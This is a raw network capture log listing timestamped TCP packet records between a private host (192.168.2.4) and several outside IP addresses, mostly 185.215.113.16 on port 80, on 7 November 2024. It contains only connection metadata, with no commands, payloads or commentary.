Nov 7, 2024 07:33:24.098833084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098845005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098855019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098865032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098870039 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.098881006 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098889112 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.098892927 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098901987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098913908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098922968 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.098923922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098942041 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.098962069 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.099805117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.099817038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.099827051 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.099839926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.099849939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.099852085 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.099860907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.099873066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.099884033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.099884987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.099900007 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.099903107 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.099911928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.099944115 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.099972963 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.100771904 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.100783110 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.100792885 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.100805044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.100816011 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.100816011 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.100826025 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.100835085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.100845098 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.100846052 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.100855112 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.100883007 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.100894928 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.101701021 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.101712942 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.101722002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.101758957 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.101783037 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.114108086 CET	49890	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.114123106 CET	443	49890	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.115214109 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.123462915 CET	49890	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.123467922 CET	443	49890	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.129147053 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.129153967 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.129451990 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.133832932 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.133887053 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.133903027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.133918047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.133940935 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.133956909 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.134069920 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.134079933 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.134109974 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.134131908 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.134289980 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.134300947 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.134313107 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.134318113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.134377956 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.134541035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.134579897 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.134597063 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.134608030 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.134618044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.134628057 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.134653091 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.134677887 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.134998083 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.135006905 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.135016918 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.135027885 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.135039091 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.135046005 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.135067940 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.135080099 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.135636091 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.135694981 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.136013031 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.166536093 CET	443	49886	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.166616917 CET	443	49886	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.166824102 CET	49886	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.175376892 CET	49886	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.175385952 CET	443	49886	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.175478935 CET	443	49887	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.175532103 CET	443	49887	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.175579071 CET	443	49887	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.175600052 CET	49887	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.175641060 CET	49887	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.176407099 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.176456928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.176467896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.176475048 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.176491976 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.181242943 CET	443	49889	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.181291103 CET	443	49889	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.181372881 CET	49889	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.183330059 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.188512087 CET	49887	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.188512087 CET	49887	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.188529968 CET	443	49887	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.188543081 CET	443	49887	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.189961910 CET	49894	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.189980030 CET	443	49894	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.190090895 CET	49894	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.190257072 CET	49889	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.190265894 CET	443	49889	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.190277100 CET	49889	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.190280914 CET	443	49889	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.193679094 CET	49895	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.193716049 CET	443	49895	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.193788052 CET	49895	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.201565027 CET	49894	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.201576948 CET	443	49894	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.202454090 CET	49895	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.202467918 CET	443	49895	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.203617096 CET	49896	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.203638077 CET	443	49896	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.203694105 CET	49896	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.203896999 CET	49896	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.203908920 CET	443	49896	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.216074944 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.216134071 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.216144085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.216151953 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.216171980 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.216248989 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.216259956 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.216270924 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.216295958 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.216321945 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.216448069 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.216485977 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.216547966 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.216559887 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.216593027 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.216762066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.216772079 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.216782093 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.216794014 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.216804028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.216804981 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.216820002 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.216850042 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.217081070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217092037 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217101097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217119932 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.217147112 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.217324972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217335939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217345953 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217356920 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217369080 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217372894 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.217379093 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217390060 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217398882 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.217411995 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.217447042 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.217895031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217906952 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217916012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217927933 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217937946 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217941046 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.217947960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217961073 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217963934 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.217971087 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217982054 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217983007 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.217992067 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.217999935 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.218004942 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.218028069 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.218055010 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.218801975 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.218811989 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.218827963 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.218837976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.218843937 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.218853951 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.218864918 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.218873978 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.218874931 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.218883991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.218895912 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.218903065 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.218907118 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.218919992 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.218921900 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.218931913 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.218940973 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.218964100 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.219760895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.219777107 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.219785929 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.219796896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.219804049 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.219808102 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.219818115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.219821930 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.219829082 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.219840050 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.219849110 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.219855070 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.219857931 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.219873905 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.219875097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.219886065 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.219907045 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.219933033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.220607042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.220618010 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.220655918 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.253799915 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.253813028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.253823996 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.253842115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.253854990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.253863096 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.253865957 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.253880024 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.253899097 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.253916979 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.254153013 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.254199982 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.254271030 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.254281998 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.254292965 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.254304886 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.254312992 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.254316092 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.254327059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.254338980 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.254347086 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.254349947 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.254373074 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.254395962 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.254796028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.254812002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.254846096 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.254859924 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.256495953 CET	443	49890	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.256521940 CET	443	49890	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.256551027 CET	443	49890	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.256598949 CET	49890	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.273854017 CET	443	49891	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.292733908 CET	49876	56001	192.168.2.4	162.230.48.189
Nov 7, 2024 07:33:24.294080019 CET	49890	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.294090033 CET	443	49890	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.294158936 CET	49890	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.294164896 CET	443	49890	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.295953035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.296005964 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.296010971 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.296027899 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.296051025 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.296072960 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.297514915 CET	56001	49876	162.230.48.189	192.168.2.4
Nov 7, 2024 07:33:24.297677040 CET	49876	56001	192.168.2.4	162.230.48.189
Nov 7, 2024 07:33:24.302560091 CET	56001	49876	162.230.48.189	192.168.2.4
Nov 7, 2024 07:33:24.310126066 CET	49891	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.310133934 CET	443	49891	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.310554981 CET	443	49891	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.312114954 CET	49891	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.312185049 CET	443	49891	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.312268019 CET	49891	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.322500944 CET	49897	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.322530985 CET	443	49897	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.322585106 CET	49897	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.323682070 CET	443	49892	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.329569101 CET	49897	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.329587936 CET	443	49897	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.330368042 CET	49892	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.330383062 CET	443	49892	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.330969095 CET	49892	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.330972910 CET	443	49892	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.335745096 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.335820913 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.335886955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.335901022 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.335943937 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.336025953 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.336095095 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.336097956 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.336107016 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.336117983 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.336129904 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.336133957 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.336158991 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.336185932 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.336453915 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.336466074 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.336500883 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.336515903 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.336601019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.336612940 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.336628914 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.336638927 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.336639881 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.336651087 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.336659908 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.336687088 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.336994886 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.337006092 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.337016106 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.337028027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.337042093 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.337039948 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.337057114 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.337075949 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.337096930 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.337116957 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.337583065 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.337593079 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.337603092 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.337614059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.337625980 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.337635994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.337636948 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.337647915 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.337655067 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.337677002 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.337692022 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.338139057 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338150024 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338159084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338175058 CET	80	49882	185.215.113.16	192.168.2.4
